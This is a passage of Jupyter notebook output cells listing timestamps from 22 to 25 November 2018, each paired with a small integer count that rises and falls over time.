"['2018-11-22 20:02:50.065273', 21]\n",
"['2018-11-22 20:03:04.326467', 22]\n",
"['2018-11-22 20:03:58.410818', 20]\n",
"['2018-11-22 20:04:01.201152', 21]\n",
"['2018-11-22 20:04:11.525520', 22]\n",
"['2018-11-22 20:04:38.779799', 21]\n",
"['2018-11-22 20:04:46.906734', 20]\n",
"['2018-11-22 20:04:50.261977', 19]\n",
"['2018-11-22 20:05:06.650034', 20]\n",
"['2018-11-22 20:05:35.701732', 19]\n",
"['2018-11-22 20:05:39.952315', 18]\n",
"['2018-11-22 20:05:49.836710', 19]\n",
"['2018-11-22 20:06:54.285461', 18]\n",
"['2018-11-22 20:07:08.346863', 17]\n",
"['2018-11-22 20:07:08.895278', 18]\n",
"['2018-11-22 20:07:12.582148', 17]\n",
"['2018-11-22 20:08:40.820355', 16]\n",
"['2018-11-22 20:09:18.919382', 17]\n",
"['2018-11-22 20:09:49.012394', 16]\n",
"['2018-11-22 20:10:00.470626', 15]\n",
"['2018-11-22 20:10:14.752363', 16]\n",
"['2018-11-22 20:11:14.685026', 15]\n",
"['2018-11-22 20:12:07.093271', 14]\n",
"['2018-11-22 20:12:47.228243', 13]\n",
"['2018-11-22 20:12:47.291405', 14]\n",
"['2018-11-22 20:13:09.806549', 13]\n",
"['2018-11-22 20:13:52.084896', 10]\n",
"['2018-11-22 20:14:00.485801', 9]\n",
"['2018-11-22 20:16:10.148042', 8]\n",
"['2018-11-22 20:18:01.321651', 7]\n",
"['2018-11-22 20:18:28.316117', 6]\n",
"['2018-11-22 20:19:04.794226', 5]\n",
"['2018-11-22 20:34:20.991882', 3]\n",
"['2018-11-22 20:34:28.070425', 4]\n",
"['2018-11-25 05:52:56.169994', 3]\n",
"['2018-11-25 05:53:12.828207', 4]\n",
"['2018-11-25 05:59:53.102268', 5]\n",
"['2018-11-25 06:05:38.163025', 4]\n",
"['2018-11-25 06:07:37.028066', 5]\n",
"['2018-11-25 06:08:30.252850', 4]\n",
"['2018-11-25 06:10:20.638751', 5]\n",
"['2018-11-25 06:12:27.448049', 6]\n",
"['2018-11-25 06:17:19.077905', 4]\n",
"['2018-11-25 06:18:42.503768', 5]\n",
"['2018-11-25 06:24:07.608947', 3]\n",
"['2018-11-25 06:24:57.067453', 4]\n",
"['2018-11-25 06:30:17.286365', 5]\n",
"['2018-11-25 06:37:07.360210', 3]\n",
"['2018-11-25 06:50:52.110515', 4]\n",
"['2018-11-25 06:52:58.419330', 5]\n",
"['2018-11-25 06:53:03.701818', 6]\n",
"['2018-11-25 06:53:03.891143', 7]\n",
"['2018-11-25 06:53:27.829128', 8]\n",
"['2018-11-25 06:54:05.616832', 7]\n",
"['2018-11-25 06:54:57.062910', 6]\n",
"['2018-11-25 06:57:01.735725', 7]\n",
"['2018-11-25 07:05:01.459847', 3]\n",
"['2018-11-25 07:10:43.438029', 4]\n",
"['2018-11-25 07:20:04.618748', 3]\n",
"['2018-11-25 07:22:42.171224', 4]\n",
"['2018-11-25 07:28:20.996861', 3]\n",
"['2018-11-25 07:30:57.924203', 4]\n",
"['2018-11-25 07:31:57.963168', 5]\n",
"['2018-11-25 07:32:13.089040', 6]\n",
"['2018-11-25 07:33:05.820259', 7]\n",
"['2018-11-25 07:36:21.955618', 5]\n",
"['2018-11-25 07:36:34.416258', 6]\n",
"['2018-11-25 07:36:34.820946', 7]\n",
"['2018-11-25 07:36:45.116908', 8]\n",
"['2018-11-25 07:37:44.471306', 9]\n",
"['2018-11-25 07:38:08.511823', 8]\n",
"['2018-11-25 07:38:21.753015', 9]\n",
"['2018-11-25 07:41:10.712080', 8]\n",
"['2018-11-25 07:43:43.705929', 7]\n",
"['2018-11-25 07:44:16.148647', 6]\n",
"['2018-11-25 07:45:22.983959', 7]\n",
"['2018-11-25 07:45:28.459359', 8]\n",
"['2018-11-25 07:45:32.132192', 9]\n",
"['2018-11-25 07:50:21.474390', 3]\n",
"['2018-11-25 07:50:32.083649', 4]\n",
"['2018-11-25 07:51:50.849562', 5]\n",
"['2018-11-25 07:58:02.042714', 3]\n",
"['2018-11-25 08:01:36.023900', 4]\n",
"['2018-11-25 08:03:06.023692', 3]\n",
"['2018-11-25 08:16:08.202895', 4]\n",
"['2018-11-25 08:17:01.039355', 5]\n",
"['2018-11-25 08:17:51.683483', 6]\n",
"['2018-11-25 08:18:08.292270', 7]\n",
"['2018-11-25 08:20:42.391831', 6]\n",
"['2018-11-25 08:20:42.744894', 7]\n",
"['2018-11-25 08:20:53.147019', 8]\n",
"['2018-11-25 08:21:35.065636', 9]\n",
"['2018-11-25 08:22:14.773070', 10]\n",
"['2018-11-25 08:22:45.105405', 11]\n",
"['2018-11-25 08:24:27.781043', 12]\n",
"['2018-11-25 08:24:36.465930', 13]\n",
"['2018-11-25 08:25:25.902030', 14]\n",
"['2018-11-25 08:25:59.017271', 13]\n",
"['2018-11-25 08:26:57.429957', 14]\n",
"['2018-11-25 08:27:05.780901', 15]\n",
"['2018-11-25 08:27:55.604285', 16]\n",
"['2018-11-25 08:28:17.650532', 14]\n",
"['2018-11-25 08:28:21.107291', 15]\n",
"['2018-11-25 08:29:21.076982', 14]\n",
"['2018-11-25 08:29:39.542828', 15]\n",
"['2018-11-25 08:29:47.257054', 14]\n",
"['2018-11-25 08:30:00.429502', 13]\n",
"['2018-11-25 08:30:03.153068', 14]\n",
"['2018-11-25 08:30:22.338763', 15]\n",
"['2018-11-25 08:34:13.733284', 5]\n",
"['2018-11-25 08:35:19.262284', 4]\n",
"['2018-11-25 08:41:17.930718', 3]\n",
"['2018-11-25 08:42:02.353669', 4]\n",
"['2018-11-25 08:46:06.486889', 3]\n",
"['2018-11-25 08:53:16.367115', 4]\n",
"['2018-11-25 08:56:57.748533', 5]\n",
"['2018-11-25 09:01:57.569632', 4]\n",
"['2018-11-25 09:02:02.705042', 5]\n",
"['2018-11-25 09:03:23.599402', 6]\n",
"['2018-11-25 09:04:36.960784', 5]\n",
"['2018-11-25 09:05:13.442190', 6]\n",
"['2018-11-25 09:05:15.228551', 7]\n",
"['2018-11-25 09:05:51.334958', 8]\n",
"['2018-11-25 09:06:07.440839', 9]\n",
"['2018-11-25 09:06:10.013195', 10]\n",
"['2018-11-25 09:06:11.993223', 11]\n",
"['2018-11-25 09:06:19.239697', 12]\n",
"['2018-11-25 09:06:21.423240', 13]\n",
"['2018-11-25 09:06:25.625075', 14]\n",
"['2018-11-25 09:06:37.760067', 15]\n",
"['2018-11-25 09:06:39.129826', 16]\n",
"['2018-11-25 09:06:46.065731', 17]\n",
"['2018-11-25 09:06:55.503272', 18]\n",
"['2018-11-25 09:07:01.844385', 19]\n",
"['2018-11-25 09:07:12.792739', 20]\n",
"['2018-11-25 09:07:17.221943', 21]\n",
"['2018-11-25 09:07:40.066777', 22]\n",
"['2018-11-25 09:07:43.505136', 23]\n",
"['2018-11-25 09:08:09.297708', 24]\n",
"['2018-11-25 09:08:50.610599', 23]\n",
"['2018-11-25 09:09:03.935174', 24]\n",
"['2018-11-25 09:09:08.493309', 25]\n",
"['2018-11-25 09:09:15.747209', 26]\n",
"['2018-11-25 09:09:25.744598', 25]\n",
"['2018-11-25 09:10:15.029034', 26]\n",
"['2018-11-25 09:10:19.113114', 27]\n",
"['2018-11-25 09:10:48.503172', 26]\n",
"['2018-11-25 09:11:09.185044', 27]\n",
"['2018-11-25 09:11:24.762643', 26]\n",
"['2018-11-25 09:11:26.213233', 25]\n",
"['2018-11-25 09:11:26.469404', 26]\n",
"['2018-11-25 09:11:28.971226', 25]\n",
"['2018-11-25 09:11:36.993325', 23]\n",
"['2018-11-25 09:11:41.523532', 22]\n",
"['2018-11-25 09:11:59.777943', 21]\n",
"['2018-11-25 09:12:25.899520', 22]\n",
"['2018-11-25 09:13:00.926969', 23]\n",
"['2018-11-25 09:13:26.679007', 22]\n",
"['2018-11-25 09:13:44.883547', 23]\n",
"['2018-11-25 09:14:03.296231', 24]\n",
"['2018-11-25 09:15:38.274663', 23]\n",
"['2018-11-25 09:15:52.199145', 24]\n",
"['2018-11-25 09:15:54.624915', 25]\n",
"['2018-11-25 09:16:30.470414', 24]\n",
"['2018-11-25 09:16:32.094451', 25]\n",
"['2018-11-25 09:16:36.753969', 24]\n",
"['2018-11-25 09:16:47.520303', 25]\n",
"['2018-11-25 09:16:50.517421', 26]\n",
"['2018-11-25 09:16:51.512343', 27]\n",
"['2018-11-25 09:18:36.863751', 23]\n",
"['2018-11-25 09:18:37.996089', 24]\n",
"['2018-11-25 09:19:09.066413', 22]\n",
"['2018-11-25 09:19:30.166387', 23]\n",
"['2018-11-25 09:19:40.041682', 22]\n",
"['2018-11-25 09:20:18.152679', 19]\n",
"['2018-11-25 09:20:27.540576', 18]\n",
"['2018-11-25 09:20:43.323321', 16]\n",
"['2018-11-25 09:20:55.459156', 10]\n",
"['2018-11-25 09:21:14.568124', 9]\n",
"['2018-11-25 09:21:30.177358', 8]\n",
"['2018-11-25 09:23:34.210076', 7]\n",
"['2018-11-25 09:26:27.432864', 5]\n",
"['2018-11-25 09:27:48.549474', 4]\n",
"['2018-11-25 09:28:38.690171', 5]\n",
"['2018-11-25 09:28:50.863025', 6]\n",
"['2018-11-25 09:38:29.378406', 3]\n",
"['2018-11-25 09:39:13.733310', 4]\n",
"['2018-11-25 09:41:21.549478', 5]\n",
"['2018-11-25 09:41:53.105263', 6]\n",
"['2018-11-25 09:43:09.835489', 5]\n",
"['2018-11-25 09:43:53.939189', 6]\n",
"['2018-11-25 09:44:25.735262', 7]\n",
"['2018-11-25 09:45:29.789801', 8]\n",
"['2018-11-25 09:45:45.364736', 9]\n",
"['2018-11-25 09:47:11.695975', 8]\n",
"['2018-11-25 09:47:44.530548', 9]\n",
"['2018-11-25 09:48:20.394783', 10]\n",
"['2018-11-25 09:48:21.697633', 11]\n",
"['2018-11-25 09:48:31.125971', 9]\n",
"['2018-11-25 09:48:37.548950', 10]\n",
"['2018-11-25 09:49:07.608462', 9]\n",
"['2018-11-25 09:50:02.370944', 10]\n",
"['2018-11-25 09:50:13.643677', 11]\n",
"['2018-11-25 09:51:09.618618', 10]\n",
"['2018-11-25 09:51:30.283379', 11]\n",
"['2018-11-25 09:52:55.540251', 9]\n",
"['2018-11-25 09:52:57.692707', 10]\n",
"['2018-11-25 09:53:11.301871', 11]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 09:53:12.500120', 12]\n",
"['2018-11-25 09:53:12.892753', 13]\n",
"['2018-11-25 09:53:22.930091', 14]\n",
"['2018-11-25 09:53:34.744250', 15]\n",
"['2018-11-25 09:53:40.708957', 16]\n",
"['2018-11-25 09:53:50.146897', 15]\n",
"['2018-11-25 09:54:13.191820', 14]\n",
"['2018-11-25 09:54:32.749405', 15]\n",
"['2018-11-25 09:55:05.913826', 16]\n",
"['2018-11-25 09:55:15.419400', 17]\n",
"['2018-11-25 09:55:34.016155', 16]\n",
"['2018-11-25 09:56:11.447416', 17]\n",
"['2018-11-25 09:56:16.251580', 16]\n",
"['2018-11-25 09:56:16.770545', 17]\n",
"['2018-11-25 09:58:06.917886', 18]\n",
"['2018-11-25 09:58:41.228457', 19]\n",
"['2018-11-25 09:59:06.848988', 18]\n",
"['2018-11-25 09:59:10.908745', 19]\n",
"['2018-11-25 09:59:25.892322', 17]\n",
"['2018-11-25 09:59:37.494475', 16]\n",
"['2018-11-25 09:59:41.230498', 15]\n",
"['2018-11-25 09:59:42.563604', 16]\n",
"['2018-11-25 09:59:52.598487', 15]\n",
"['2018-11-25 10:00:13.543849', 14]\n",
"['2018-11-25 10:00:15.173468', 15]\n",
"['2018-11-25 10:00:20.451827', 16]\n",
"['2018-11-25 10:00:39.877710', 15]\n",
"['2018-11-25 10:02:02.516783', 16]\n",
"['2018-11-25 10:02:10.952631', 17]\n",
"['2018-11-25 10:02:20.841518', 18]\n",
"['2018-11-25 10:04:24.579784', 17]\n",
"['2018-11-25 10:04:47.226688', 18]\n",
"['2018-11-25 10:04:57.870240', 17]\n",
"['2018-11-25 10:05:02.858597', 16]\n",
"['2018-11-25 10:05:16.966522', 15]\n",
"['2018-11-25 10:05:41.591078', 16]\n",
"['2018-11-25 10:05:48.438860', 15]\n",
"['2018-11-25 10:06:19.648923', 13]\n",
"['2018-11-25 10:06:50.915544', 8]\n",
"['2018-11-25 10:07:03.019547', 6]\n",
"['2018-11-25 10:09:42.459742', 4]\n",
"['2018-11-25 10:11:03.980200', 5]\n",
"['2018-11-25 10:11:31.457647', 6]\n",
"['2018-11-25 10:12:02.486029', 5]\n",
"['2018-11-25 10:12:23.602584', 6]\n",
"['2018-11-25 10:12:24.500325', 7]\n",
"['2018-11-25 10:15:47.183393', 5]\n",
"['2018-11-25 10:16:05.120954', 6]\n",
"['2018-11-25 10:17:33.418043', 4]\n",
"['2018-11-25 10:17:43.516092', 5]\n",
"['2018-11-25 10:19:32.956356', 6]\n",
"['2018-11-25 10:20:27.042878', 5]\n",
"['2018-11-25 10:24:36.284911', 6]\n",
"['2018-11-25 10:25:34.869666', 4]\n",
"['2018-11-25 10:25:45.487463', 5]\n",
"['2018-11-25 10:26:01.095411', 6]\n",
"['2018-11-25 10:26:03.096949', 7]\n",
"['2018-11-25 10:30:01.817589', 8]\n",
"['2018-11-25 10:30:33.411007', 9]\n",
"['2018-11-25 10:30:35.596195', 10]\n",
"['2018-11-25 10:31:10.887570', 11]\n",
"['2018-11-25 10:32:10.391446', 10]\n",
"['2018-11-25 10:33:06.523263', 11]\n",
"['2018-11-25 10:33:16.206054', 12]\n",
"['2018-11-25 10:34:10.732514', 13]\n",
"['2018-11-25 10:34:12.021563', 14]\n",
"['2018-11-25 10:34:33.412208', 13]\n",
"['2018-11-25 10:34:57.894007', 14]\n",
"['2018-11-25 10:35:22.755320', 13]\n",
"['2018-11-25 10:36:24.970646', 12]\n",
"['2018-11-25 10:37:01.508639', 11]\n",
"['2018-11-25 10:37:11.059489', 10]\n",
"['2018-11-25 10:37:35.838023', 9]\n",
"['2018-11-25 10:38:22.039040', 10]\n",
"['2018-11-25 10:38:35.287785', 11]\n",
"['2018-11-25 10:38:38.644723', 12]\n",
"['2018-11-25 10:38:48.854290', 13]\n",
"['2018-11-25 10:39:16.080078', 14]\n",
"['2018-11-25 10:39:22.127756', 15]\n",
"['2018-11-25 10:39:26.714773', 16]\n",
"['2018-11-25 10:39:49.629468', 17]\n",
"['2018-11-25 10:40:19.113787', 18]\n",
"['2018-11-25 10:40:35.022698', 19]\n",
"['2018-11-25 10:40:37.778244', 20]\n",
"['2018-11-25 10:40:40.635416', 21]\n",
"['2018-11-25 10:40:56.634151', 20]\n",
"['2018-11-25 10:41:08.109709', 19]\n",
"['2018-11-25 10:41:09.149281', 20]\n",
"['2018-11-25 10:41:12.832118', 19]\n",
"['2018-11-25 10:41:53.747245', 20]\n",
"['2018-11-25 10:42:06.193447', 19]\n",
"['2018-11-25 10:42:38.062808', 18]\n",
"['2018-11-25 10:44:02.818957', 16]\n",
"['2018-11-25 10:44:13.163031', 17]\n",
"['2018-11-25 10:44:17.857487', 16]\n",
"['2018-11-25 10:44:38.606217', 15]\n",
"['2018-11-25 10:44:52.379045', 14]\n",
"['2018-11-25 10:45:46.200159', 15]\n",
"['2018-11-25 10:45:48.613050', 16]\n",
"['2018-11-25 10:46:16.813109', 17]\n",
"['2018-11-25 10:46:32.519287', 16]\n",
"['2018-11-25 10:47:20.760195', 14]\n",
"['2018-11-25 10:47:50.847633', 13]\n",
"['2018-11-25 10:47:52.385085', 14]\n",
"['2018-11-25 10:48:09.496812', 15]\n",
"['2018-11-25 10:48:15.427877', 16]\n",
"['2018-11-25 10:48:20.858821', 15]\n",
"['2018-11-25 10:48:34.519243', 16]\n",
"['2018-11-25 10:49:24.596397', 15]\n",
"['2018-11-25 10:49:34.533931', 13]\n",
"['2018-11-25 10:49:54.520278', 12]\n",
"['2018-11-25 10:50:04.331414', 10]\n",
"['2018-11-25 10:50:16.927520', 9]\n",
"['2018-11-25 10:50:24.532913', 8]\n",
"['2018-11-25 10:50:35.170922', 7]\n",
"['2018-11-25 10:52:02.829773', 6]\n",
"['2018-11-25 10:53:35.212633', 4]\n",
"['2018-11-25 10:58:08.707999', 3]\n",
"['2018-11-25 10:59:54.403436', 4]\n",
"['2018-11-25 11:00:29.121034', 5]\n",
"['2018-11-25 11:09:08.445127', 3]\n",
"['2018-11-25 11:11:42.527471', 4]\n",
"['2018-11-25 11:12:55.412229', 5]\n",
"['2018-11-25 11:13:50.309015', 6]\n",
"['2018-11-25 11:13:52.976725', 7]\n",
"['2018-11-25 11:14:45.722057', 8]\n",
"['2018-11-25 11:15:33.844808', 9]\n",
"['2018-11-25 11:15:44.566469', 8]\n",
"['2018-11-25 11:17:19.343809', 9]\n",
"['2018-11-25 11:17:53.249007', 10]\n",
"['2018-11-25 11:18:58.517020', 9]\n",
"['2018-11-25 11:20:36.288344', 8]\n",
"['2018-11-25 11:20:44.463395', 9]\n",
"['2018-11-25 11:20:45.270808', 10]\n",
"['2018-11-25 11:20:46.875659', 11]\n",
"['2018-11-25 11:20:50.289328', 12]\n",
"['2018-11-25 11:20:55.148072', 13]\n",
"['2018-11-25 11:20:58.057267', 14]\n",
"['2018-11-25 11:21:14.466730', 15]\n",
"['2018-11-25 11:21:16.332182', 16]\n",
"['2018-11-25 11:21:35.798469', 17]\n",
"['2018-11-25 11:21:40.209876', 18]\n",
"['2018-11-25 11:21:53.261915', 17]\n",
"['2018-11-25 11:22:09.399837', 16]\n",
"['2018-11-25 11:22:19.669524', 17]\n",
"['2018-11-25 11:22:35.983501', 18]\n",
"['2018-11-25 11:22:36.304190', 17]\n",
"['2018-11-25 11:23:05.385976', 18]\n",
"['2018-11-25 11:24:36.933110', 19]\n",
"['2018-11-25 11:24:48.393371', 20]\n",
"['2018-11-25 11:24:52.273105', 21]\n",
"['2018-11-25 11:25:12.579578', 20]\n",
"['2018-11-25 11:25:36.731366', 18]\n",
"['2018-11-25 11:25:55.411792', 19]\n",
"['2018-11-25 11:26:28.031054', 20]\n",
"['2018-11-25 11:26:34.307733', 21]\n",
"['2018-11-25 11:26:58.983486', 20]\n",
"['2018-11-25 11:27:28.286872', 19]\n",
"['2018-11-25 11:27:43.421022', 20]\n",
"['2018-11-25 11:27:56.717167', 19]\n",
"['2018-11-25 11:28:27.565923', 20]\n",
"['2018-11-25 11:28:38.497258', 21]\n",
"['2018-11-25 11:28:50.266388', 20]\n",
"['2018-11-25 11:29:08.642836', 19]\n",
"['2018-11-25 11:29:31.679790', 20]\n",
"['2018-11-25 11:29:46.040523', 19]\n",
"['2018-11-25 11:30:02.784616', 17]\n",
"['2018-11-25 11:30:44.554862', 18]\n",
"['2018-11-25 11:30:51.317935', 17]\n",
"['2018-11-25 11:31:17.929385', 16]\n",
"['2018-11-25 11:31:37.084080', 17]\n",
"['2018-11-25 11:32:11.673426', 18]\n",
"['2018-11-25 11:32:19.423896', 19]\n",
"['2018-11-25 11:33:04.438407', 18]\n",
"['2018-11-25 11:33:40.215377', 17]\n",
"['2018-11-25 11:34:22.126673', 16]\n",
"['2018-11-25 11:34:26.290878', 15]\n",
"['2018-11-25 11:34:38.141788', 14]\n",
"['2018-11-25 11:34:42.630728', 15]\n",
"['2018-11-25 11:35:01.172147', 11]\n",
"['2018-11-25 11:35:20.099653', 12]\n",
"['2018-11-25 11:35:34.327037', 13]\n",
"['2018-11-25 11:37:01.813754', 9]\n",
"['2018-11-25 11:37:29.989389', 8]\n",
"['2018-11-25 11:37:36.956526', 9]\n",
"['2018-11-25 11:37:43.833624', 10]\n",
"['2018-11-25 11:38:04.811312', 9]\n",
"['2018-11-25 11:39:30.810408', 7]\n",
"['2018-11-25 11:40:32.451259', 5]\n",
"['2018-11-25 11:41:00.740303', 6]\n",
"['2018-11-25 11:41:44.199392', 7]\n",
"['2018-11-25 11:43:32.463290', 6]\n",
"['2018-11-25 11:43:39.189065', 5]\n",
"['2018-11-25 11:45:44.740075', 4]\n",
"['2018-11-25 11:53:17.586354', 3]\n",
"['2018-11-25 11:59:14.239639', 4]\n",
"['2018-11-25 11:59:26.632459', 5]\n",
"['2018-11-25 12:00:42.451870', 6]\n",
"['2018-11-25 12:02:02.244141', 7]\n",
"['2018-11-25 12:03:25.463277', 8]\n",
"['2018-11-25 12:04:20.674865', 7]\n",
"['2018-11-25 12:05:54.029206', 6]\n",
"['2018-11-25 12:06:12.233645', 5]\n",
"['2018-11-25 12:06:17.590773', 6]\n",
"['2018-11-25 12:06:24.801712', 7]\n",
"['2018-11-25 12:06:29.408501', 8]\n",
"['2018-11-25 12:06:30.710019', 9]\n",
"['2018-11-25 12:06:32.165591', 10]\n",
"['2018-11-25 12:06:32.873904', 11]\n",
"['2018-11-25 12:06:42.186090', 12]\n",
"['2018-11-25 12:06:46.553628', 13]\n",
"['2018-11-25 12:06:52.910223', 14]\n",
"['2018-11-25 12:06:57.782097', 15]\n",
"['2018-11-25 12:07:16.657559', 16]\n",
"['2018-11-25 12:07:20.737768', 17]\n",
"['2018-11-25 12:07:30.823351', 16]\n",
"['2018-11-25 12:07:34.338372', 17]\n",
"['2018-11-25 12:07:51.235391', 18]\n",
"['2018-11-25 12:08:08.675136', 19]\n",
"['2018-11-25 12:09:02.257906', 20]\n",
"['2018-11-25 12:09:14.503653', 21]\n",
"['2018-11-25 12:09:33.611034', 22]\n",
"['2018-11-25 12:10:13.104379', 23]\n",
"['2018-11-25 12:10:46.243659', 22]\n",
"['2018-11-25 12:10:54.255601', 21]\n",
"['2018-11-25 12:10:59.733255', 22]\n",
"['2018-11-25 12:11:37.087722', 20]\n",
"['2018-11-25 12:11:57.097066', 19]\n",
"['2018-11-25 12:12:09.790842', 18]\n",
"['2018-11-25 12:12:11.104238', 19]\n",
"['2018-11-25 12:12:12.457402', 20]\n",
"['2018-11-25 12:12:18.172280', 21]\n",
"['2018-11-25 12:13:03.375092', 20]\n",
"['2018-11-25 12:13:22.952420', 19]\n",
"['2018-11-25 12:14:11.161633', 20]\n",
"['2018-11-25 12:14:15.088010', 19]\n",
"['2018-11-25 12:14:20.137478', 18]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 12:14:38.957070', 19]\n",
"['2018-11-25 12:14:55.789802', 18]\n",
"['2018-11-25 12:15:00.825767', 17]\n",
"['2018-11-25 12:15:15.895102', 16]\n",
"['2018-11-25 12:15:22.372330', 17]\n",
"['2018-11-25 12:16:22.993488', 14]\n",
"['2018-11-25 12:18:32.562618', 13]\n",
"['2018-11-25 12:18:51.545363', 14]\n",
"['2018-11-25 12:18:54.011911', 15]\n",
"['2018-11-25 12:19:23.028712', 10]\n",
"['2018-11-25 12:19:29.423100', 11]\n",
"['2018-11-25 12:20:02.589540', 8]\n",
"['2018-11-25 12:20:10.376079', 9]\n",
"['2018-11-25 12:23:12.607053', 8]\n",
"['2018-11-25 12:24:11.904284', 7]\n",
"['2018-11-25 12:24:17.895164', 8]\n",
"['2018-11-25 12:25:11.148378', 9]\n",
"['2018-11-25 12:25:50.751532', 10]\n",
"['2018-11-25 12:28:14.670150', 7]\n",
"['2018-11-25 12:29:44.571959', 5]\n",
"['2018-11-25 12:30:29.645132', 4]\n",
"['2018-11-25 12:31:49.213343', 5]\n",
"['2018-11-25 12:32:44.355053', 6]\n",
"['2018-11-25 12:33:50.395237', 5]\n",
"['2018-11-25 12:37:00.292037', 4]\n",
"['2018-11-25 12:38:48.208682', 5]\n",
"['2018-11-25 12:39:22.331765', 4]\n",
"['2018-11-25 12:40:52.748225', 5]\n",
"['2018-11-25 12:44:09.782767', 6]\n",
"['2018-11-25 12:44:39.483030', 7]\n",
"['2018-11-25 12:46:40.974559', 5]\n",
"['2018-11-25 12:46:41.306353', 6]\n",
"['2018-11-25 12:46:46.956645', 7]\n",
"['2018-11-25 12:47:07.099253', 8]\n",
"['2018-11-25 12:48:20.642698', 7]\n",
"['2018-11-25 12:50:14.769287', 8]\n",
"['2018-11-25 12:50:27.008449', 9]\n",
"['2018-11-25 12:50:37.235908', 10]\n",
"['2018-11-25 12:50:40.125464', 11]\n",
"['2018-11-25 12:50:48.293611', 12]\n",
"['2018-11-25 12:51:13.624920', 11]\n",
"['2018-11-25 12:51:13.883350', 12]\n",
"['2018-11-25 12:51:29.758566', 13]\n",
"['2018-11-25 12:51:37.168586', 12]\n",
"['2018-11-25 12:51:41.122429', 11]\n",
"['2018-11-25 12:51:45.442338', 12]\n",
"['2018-11-25 12:51:53.435401', 13]\n",
"['2018-11-25 12:53:08.704857', 14]\n",
"['2018-11-25 12:53:22.471468', 13]\n",
"['2018-11-25 12:53:22.758449', 14]\n",
"['2018-11-25 12:53:22.864922', 15]\n",
"['2018-11-25 12:53:23.238945', 16]\n",
"['2018-11-25 12:53:35.015735', 17]\n",
"['2018-11-25 12:54:12.818946', 18]\n",
"['2018-11-25 12:54:25.156076', 19]\n",
"['2018-11-25 12:54:38.707376', 18]\n",
"['2018-11-25 12:54:40.884657', 19]\n",
"['2018-11-25 12:54:42.932432', 20]\n",
"['2018-11-25 12:54:49.721106', 21]\n",
"['2018-11-25 12:55:05.211782', 22]\n",
"['2018-11-25 12:55:12.456724', 23]\n",
"['2018-11-25 12:56:01.581668', 22]\n",
"['2018-11-25 12:56:23.173971', 23]\n",
"['2018-11-25 12:56:43.641137', 24]\n",
"['2018-11-25 12:56:45.788347', 23]\n",
"['2018-11-25 12:57:13.672975', 24]\n",
"['2018-11-25 12:57:17.001291', 23]\n",
"['2018-11-25 12:57:22.572769', 22]\n",
"['2018-11-25 12:57:45.059926', 23]\n",
"['2018-11-25 12:57:50.315712', 24]\n",
"['2018-11-25 12:58:43.367450', 25]\n",
"['2018-11-25 12:58:53.054707', 24]\n",
"['2018-11-25 12:59:17.136221', 23]\n",
"['2018-11-25 12:59:19.349314', 22]\n",
"['2018-11-25 12:59:19.651413', 23]\n",
"['2018-11-25 12:59:30.227467', 24]\n",
"['2018-11-25 12:59:55.351062', 23]\n",
"['2018-11-25 13:00:14.790895', 22]\n",
"['2018-11-25 13:01:01.571097', 21]\n",
"['2018-11-25 13:01:39.734816', 20]\n",
"['2018-11-25 13:02:25.908116', 18]\n",
"['2018-11-25 13:03:01.568510', 17]\n",
"['2018-11-25 13:03:42.731651', 15]\n",
"['2018-11-25 13:04:17.774469', 14]\n",
"['2018-11-25 13:04:22.556362', 11]\n",
"['2018-11-25 13:04:23.190018', 10]\n",
"['2018-11-25 13:04:43.745000', 8]\n",
"['2018-11-25 13:04:52.468485', 6]\n",
"['2018-11-25 13:04:54.680089', 7]\n",
"['2018-11-25 13:06:31.016216', 8]\n",
"['2018-11-25 13:06:36.190642', 9]\n",
"['2018-11-25 13:07:22.508465', 10]\n",
"['2018-11-25 13:07:25.394337', 11]\n",
"['2018-11-25 13:08:22.543701', 10]\n",
"['2018-11-25 13:09:04.631015', 9]\n",
"['2018-11-25 13:09:17.939587', 10]\n",
"['2018-11-25 13:10:13.454960', 9]\n",
"['2018-11-25 13:10:44.734964', 8]\n",
"['2018-11-25 13:12:41.116782', 7]\n",
"['2018-11-25 13:12:45.749798', 8]\n",
"['2018-11-25 13:12:49.022546', 9]\n",
"['2018-11-25 13:13:09.706976', 8]\n",
"['2018-11-25 13:13:24.533932', 7]\n",
"['2018-11-25 13:24:56.105670', 3]\n",
"['2018-11-25 13:25:44.810263', 4]\n",
"['2018-11-25 13:27:20.698910', 5]\n",
"['2018-11-25 13:30:08.997837', 6]\n",
"['2018-11-25 13:31:59.480589', 7]\n",
"['2018-11-25 13:32:15.322718', 8]\n",
"['2018-11-25 13:32:31.998284', 9]\n",
"['2018-11-25 13:33:07.264986', 10]\n",
"['2018-11-25 13:33:13.928119', 11]\n",
"['2018-11-25 13:35:13.911506', 10]\n",
"['2018-11-25 13:35:17.977766', 11]\n",
"['2018-11-25 13:35:18.791238', 12]\n",
"['2018-11-25 13:35:42.437332', 13]\n",
"['2018-11-25 13:36:21.978473', 14]\n",
"['2018-11-25 13:36:26.903878', 15]\n",
"['2018-11-25 13:36:28.071395', 16]\n",
"['2018-11-25 13:36:45.707433', 17]\n",
"['2018-11-25 13:36:54.383003', 18]\n",
"['2018-11-25 13:37:00.019593', 19]\n",
"['2018-11-25 13:37:18.667044', 20]\n",
"['2018-11-25 13:37:36.794676', 21]\n",
"['2018-11-25 13:37:45.392341', 20]\n",
"['2018-11-25 13:37:47.164686', 19]\n",
"['2018-11-25 13:38:00.418742', 20]\n",
"['2018-11-25 13:39:30.230895', 21]\n",
"['2018-11-25 13:39:38.605991', 22]\n",
"['2018-11-25 13:40:11.556128', 23]\n",
"['2018-11-25 13:40:59.879912', 22]\n",
"['2018-11-25 13:41:02.861836', 21]\n",
"['2018-11-25 13:41:21.742155', 19]\n",
"['2018-11-25 13:41:36.788360', 17]\n",
"['2018-11-25 13:41:42.394809', 16]\n",
"['2018-11-25 13:41:54.687326', 13]\n",
"['2018-11-25 13:41:54.872392', 14]\n",
"['2018-11-25 13:41:58.293520', 15]\n",
"['2018-11-25 13:42:01.422220', 14]\n",
"['2018-11-25 13:42:02.111895', 13]\n",
"['2018-11-25 13:42:04.710889', 14]\n",
"['2018-11-25 13:42:12.702066', 15]\n",
"['2018-11-25 13:42:33.644225', 16]\n",
"['2018-11-25 13:42:41.662593', 17]\n",
"['2018-11-25 13:42:42.613626', 18]\n",
"['2018-11-25 13:42:51.076065', 19]\n",
"['2018-11-25 13:42:56.657293', 20]\n",
"['2018-11-25 13:43:07.372198', 21]\n",
"['2018-11-25 13:43:12.166065', 20]\n",
"['2018-11-25 13:43:18.984366', 21]\n",
"['2018-11-25 13:43:19.119659', 22]\n",
"['2018-11-25 13:43:22.504293', 23]\n",
